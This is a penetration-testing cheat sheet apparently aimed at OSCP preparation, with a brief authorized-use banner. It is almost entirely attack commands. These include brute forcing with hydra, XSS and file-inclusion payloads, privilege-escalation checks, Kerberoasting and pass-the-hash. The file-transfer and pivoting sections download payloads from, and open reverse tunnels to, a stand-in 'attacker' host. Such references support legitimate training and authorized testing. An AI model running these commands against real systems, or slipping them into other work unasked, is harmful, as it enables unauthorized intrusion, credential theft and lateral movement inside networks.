← All cheat sheets

OSCP-METHODOLOGY

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

Interactive tool: Pentest Report Builder

RECONNAISSANCE#

# Passive recon (no direct target interaction)
whois target.com
host target.com
nslookup target.com
dig target.com any
theHarvester -d target.com -b google,bing
# Google dorking: site:target.com filetype:pdf

# Active recon
ping -c 3 target.com
traceroute target.com

PORT SCANNING#

# Fast initial scan
nmap -sC -sV -oA nmap/initial target

# Full TCP scan
nmap -p- -sC -sV -oA nmap/full target

# UDP scan (top ports)
nmap -sU --top-ports 50 -oA nmap/udp target

# Targeted script scan
nmap -p 80,443 --script=http-enum,http-headers target

# Aggressive scan
nmap -A -T4 -p- target

# Scan multiple targets
nmap -iL targets.txt -oA nmap/all

SERVICE ENUMERATION BY PORT#


    

FTP (21)#

nmap --script=ftp-anon,ftp-bounce target -p 21
ftp target                        # Try anonymous login
# Default creds: anonymous:anonymous

SSH (22)#

ssh user@target
hydra -l user -P wordlist.txt ssh://target
nmap --script=ssh-brute target -p 22

SMTP (25)#

nmap --script=smtp-enum-users,smtp-commands target -p 25
smtp-user-enum -M VRFY -U users.txt -t target

DNS (53)#

dig axfr @target target.com       # Zone transfer
dnsrecon -d target.com -t axfr
dnsenum target.com

HTTP/HTTPS (80/443)#

# Directory enumeration
gobuster dir -u http://target -w /usr/share/wordlists/dirb/common.txt -x php,txt,html
ffuf -u http://target/FUZZ -w /usr/share/wordlists/dirb/common.txt
feroxbuster -u http://target -w common.txt

# Technology detection
whatweb http://target
nikto -h http://target
wappalyzer (browser extension)

# CMS detection
wpscan --url http://target         # WordPress
droopescan scan drupal -u http://target  # Drupal

# Virtual host enumeration
gobuster vhost -u http://target -w subdomains.txt

SMB (139/445)#

smbclient -L //target -N          # List shares (null session)
smbclient //target/share -N      # Connect to share
smbmap -H target                  # Enumerate shares
enum4linux -a target              # Full enumeration
crackmapexec smb target -u '' -p '' --shares

# Nmap scripts
nmap --script=smb-enum-shares,smb-enum-users,smb-vuln* target -p 445

SNMP (161)#

snmpwalk -v2c -c public target
onesixtyone -c community.txt target
snmp-check target

MYSQL (3306)#

mysql -h target -u root -p
nmap --script=mysql-enum,mysql-brute target -p 3306

RDP (3389)#

xfreerdp /u:user /p:pass /v:target
hydra -l admin -P wordlist.txt rdp://target
nmap --script=rdp-vuln* target -p 3389

WINRM (5985)#

evil-winrm -i target -u user -p pass
crackmapexec winrm target -u user -p pass

WEB APPLICATION TESTING#

# SQL Injection
sqlmap -u "http://target/page?id=1" --batch --dbs
sqlmap -r request.txt --batch --dbs  # From Burp request

# XSS testing
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>

# File inclusion
http://target/page?file=../../../../../../etc/passwd
http://target/page?file=php://filter/convert.base64-encode/resource=config

# File upload bypass
# Try: .php, .php5, .phtml, .phar, .PhP, .php.jpg
# Content-Type manipulation
# Magic bytes + PHP code

PASSWORD ATTACKS#

# Wordlists
/usr/share/wordlists/rockyou.txt
/usr/share/seclists/Passwords/

# Hydra
hydra -l user -P rockyou.txt target ssh
hydra -l admin -P rockyou.txt target http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"

# Hashcat
hashcat -m 0 hash.txt rockyou.txt      # MD5
hashcat -m 1000 hash.txt rockyou.txt   # NTLM
hashcat -m 1800 hash.txt rockyou.txt   # SHA512crypt

# John
john --wordlist=rockyou.txt hash.txt
john --show hash.txt

LINUX PRIVILEGE ESCALATION#

# Automated
./linpeas.sh
./linux-smart-enumeration.sh

# Manual checks
sudo -l                           # Sudo permissions
find / -perm -4000 2>/dev/null   # SUID binaries
find / -perm -2000 2>/dev/null   # SGID binaries
cat /etc/crontab                 # Cron jobs
ls -la /etc/cron*
ps aux                           # Running processes
netstat -tulnp                   # Listening services
cat /etc/passwd                  # Users
find / -writable -type f 2>/dev/null  # Writable files
getcap -r / 2>/dev/null          # Capabilities
env                              # Environment variables
cat /etc/fstab                   # Mounted drives
find / -name "*.bak" -o -name "*.old" -o -name "*.conf" 2>/dev/null

# GTFOBins for SUID/sudo exploitation
# https://gtfobins.github.io/

WINDOWS PRIVILEGE ESCALATION#

# Automated
.\winPEAS.exe
.\PowerUp.ps1; Invoke-AllChecks
.\Seatbelt.exe -group=all

# Manual checks
whoami /priv                     # Current privileges
whoami /groups                   # Group memberships
net user                         # Local users
net localgroup Administrators    # Admin members
systeminfo                       # OS info + patches
wmic qfe list                   # Installed patches
schtasks /query /fo LIST         # Scheduled tasks
sc query                         # Services
icacls "C:\Program Files"       # Permissions
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# Unquoted service paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows"

# Service permissions
accesschk.exe -wuvc "service_name"

FILE TRANSFERS#

# Python HTTP server
python3 -m http.server 8000

# wget/curl
wget http://attacker/file -O /tmp/file
curl http://attacker/file -o /tmp/file

# certutil (Windows)
certutil -urlcache -split -f http://attacker/file file.exe

# PowerShell
Invoke-WebRequest -Uri http://attacker/file -OutFile file.exe
(New-Object Net.WebClient).DownloadFile('http://attacker/file','file.exe')

# SMB
impacket-smbserver share /tmp/share -smb2support
copy \\attacker\share\file.exe .

# SCP
scp file user@target:/tmp/

PIVOTING#

# SSH port forwarding
ssh -L 8080:internal:80 user@pivot      # Local forward
ssh -R 8080:localhost:80 user@pivot     # Remote forward
ssh -D 9050 user@pivot                  # SOCKS proxy

# Chisel
# Server (attacker): chisel server --reverse -p 8000
# Client (target): chisel client attacker:8000 R:8080:internal:80

# Ligolo-ng
# Proxy (attacker): ligolo-proxy -selfcert
# Agent (target): ligolo-agent -connect attacker:11601 -retry

ACTIVE DIRECTORY#

# Enumeration
bloodhound-python -d domain.local -u user -p pass -c all
crackmapexec smb dc -u user -p pass --users
ldapsearch -x -H ldap://dc -b "DC=domain,DC=local"

# Kerberoasting
GetUserSPNs.py domain/user:pass -dc-ip DC -request
hashcat -m 13100 kerberoast.txt rockyou.txt

# AS-REP Roasting
GetNPUsers.py domain/ -usersfile users.txt -dc-ip DC

# Pass the Hash
psexec.py domain/user@target -hashes :NTLM_HASH
evil-winrm -i target -u user -H NTLM_HASH

REPORT WRITING TIPS#

# Structure: Executive Summary, Methodology, Findings, Remediation
# Each finding: Title, Severity, Description, Impact, Steps to Reproduce, Remediation
# Include screenshots with annotations
# Document the full attack chain
# Provide specific remediation for each finding